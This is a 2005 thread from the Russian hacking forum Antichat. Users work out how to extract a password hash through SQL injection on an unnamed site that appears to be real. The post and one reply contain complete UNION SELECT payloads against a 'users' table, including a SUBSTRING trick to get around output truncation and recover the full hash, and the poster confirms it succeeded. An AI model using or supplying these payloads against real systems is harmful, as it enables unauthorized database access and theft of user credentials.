Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
13.11.2005, 15:00
|
|
Познающий
Регистрация: 15.05.2005
Сообщений: 58
Провел на форуме:
531678
Репутация:
1
|
|
вопрос по sql-injection
Дело такое, нашел sql-inj ... подобрал колонки или т.д. и т.п., в итоге получился тако запрос:
-1'+union+select+1,2,pwd,4,5,6,7,8,9,10,11,12+from+ base.users+where+id=24+limit+0,1+/*
но при таком запросе данные выводятся не полностью, а именно хеш выводится но без последних двух символов, если пробовать изменять limit то сразу выдается ошибка что неверное кол-во колонок..нужен хепл... |
|
|
13.11.2005, 15:41
|
|
Постоянный
Регистрация: 28.02.2005
Сообщений: 853
Провел на форуме:
3369632
Репутация:
749
|
|
Гм, а зачем тут вообще нужен лимит? И зачем "+" перед "/*"
И вообще обрезаться ничего не должно. Скорее всего обрез идет внутри самого скрипта
|
|
|
|
13.11.2005, 15:55
|
|
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,149
Провел на форуме:
941818
Репутация:
569
|
|
Да, обрезание (слово то какое хорошее) явно делается скриптом. Попробуй воткуть pwd в другое поле. Или юзаешь SUBSTRING() ( http://dev.mysql.com/doc/refman/4.0/...functions.html)
т.е.
-1'+union+select+1,2,SUBSTRING(pwd, 0, 30),4,5,6,7,8,9,10,11,12+from+ base.users+where+id=24+limit+0,1+/*
потом
-1'+union+select+1,2,SUBSTRING(pwd, 30, 2),4,5,6,7,8,9,10,11,12+from+ base.users+where+id=24+limit+0,1+/*
вот вроде так |
|
|
|
13.11.2005, 16:01
|
|
Познающий
Регистрация: 15.05.2005
Сообщений: 58
Провел на форуме:
531678
Репутация:
1
|
|
Trinux
SUBSTRING() помогло, огромный респект... =))
ну и +репутации =)
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
